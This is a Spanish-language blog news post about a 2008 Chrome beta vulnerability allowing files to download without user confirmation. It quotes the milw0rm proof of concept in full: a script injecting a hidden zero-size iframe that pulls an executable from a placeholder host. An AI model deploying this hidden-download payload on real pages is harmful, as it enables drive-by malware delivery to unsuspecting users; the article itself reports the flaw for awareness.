Nueva vulnerabilidad en Google Chrome


A escazos 2 días de su lanzamiento ya ha aparecido otro bugs, según reporta securityfocus.com, Chrome permite la descarga de archivos arbitarios sin permiso del usuario.





Cabe recordar que Chrome esta en Fase Beta, por lo que aún se podrán encontrar algunas vulenrabilidades más.

La nota en securityfocus.com indica: Google Chrome es propenso a una vulnerabilidad de seguridad debido a que la aplicación permite a los usuarios descargar archivos arbitrarios sin confirmación.

Este problema puede permitir a atacantes ejecutar la ingeniería social u otros tipos de ataques para engañar a los usuarios en la descarga de un archivo malisioso.

La gente de milw0rm.com ha colgado una prueba de concepto (exploit) en su sitio web:

http://www.milw0rm.com/exploits/6355

Exploit:

*******************************************************************

Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)


**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]

 

También lo puedes observar el exploit desde el mismo sitio de securityfocus.com

http://downloads.securityfocus.com/vulnerabilities/exploits/31000.html

Créditos por nerex

Fuente:
http://www.securityfocus.com/



Otras noticias de interés:

Conficker confunde a los expertos en seguridad
El director del Conficker Working Group admite que el gusano representa una amenaza masiva para Internet....
Traspaso de restricciones de ruta en cookies
Se ha reportado una vulnerabilidad de varios navegadores en el procesamiento de las cookies. Un usuario remoto puede ser capaz de traspasar las restricciones de ruta especificadas por el originante de éstas. ...
Adam Mathes, el "Google Bomber"
Este es el nuevo famoso de Internet que puso a temblar a Google haciendo uso de los keywords talentless hack (hacker poco talentoso) y posicionarse de primero en los resulatdos, en medio del terremoto que ha sido el resultado de la búsqueda go to...
Actualizaciones de seguridad en los kernel Linux
La comunidad Linux ha publicado actualizaciones de sus kernels para las ramas 2.4 y 2.6, lo que soluciona varios problemas de seguridad....
Primeras actualizaciones de 2007 para MS-Windows publicadas por Microsoft 10-01-2007
La compañía de software finalmente publicó en enero, cuatro boletines de actualizaciones, de los ocho anunciados hace unos días. Concretamente tres de ellos son de caracter crítico y uno importante....
La última actualización de Office 2003 impide abrir documentos antiguos
Office 2003, en su última renovación, impide abrir o guardar documentos antiguos de Word, Excel o PowerPoint. El motivo, según el soporte técnico de Microsoft, es que son menos seguros y pueden suponer un riesgo para el usuario. Para acceder a lo...
4to Congreso Nacional de Software Libre - Valencia - Venezuela
El Cuarto Congreso Nacional de Software Libre (Venezuela 2008) es una serie ordenada de eventos que se inician desde el 18 de abril al 19 de julio de 2008. entre uno de sus principales objetivos se encuentra el de concentrar a una selección importan...
Tascón: Ley de Tecnologías e Información pretende librar al Estado de males burocráticos
La transformación del Estado actual en un ente eficiente, responsable y libre de los males propios de la burocracia y la corrupción es el objetivo primario de la Ley de Tecnologías e Información, afirmó el diputado a la Asamblea Nacional (AN) Lu...
¿Por qué invertir ahora en aplicaciones de gestión de código abierto?
El coste no es la única razón por la que los directivos de TI deberían considerar las aplicaciones de gestión de TI de código abierto, según los analistas de la industria, en un momento en que los desarrolladores y las comunidades continúan cr...
US-CERT unificará los nombres de los Virus para evitar confusiones
La disparidad de denominaciones genera problemas tanto al usuario infectado como a las organizaciones y empresas que trabajan en este campo. US-CERT - la organización encargada de enfrentarse a los ciberataques en EE UU- pretende p...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • google
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • nueva
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidad
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra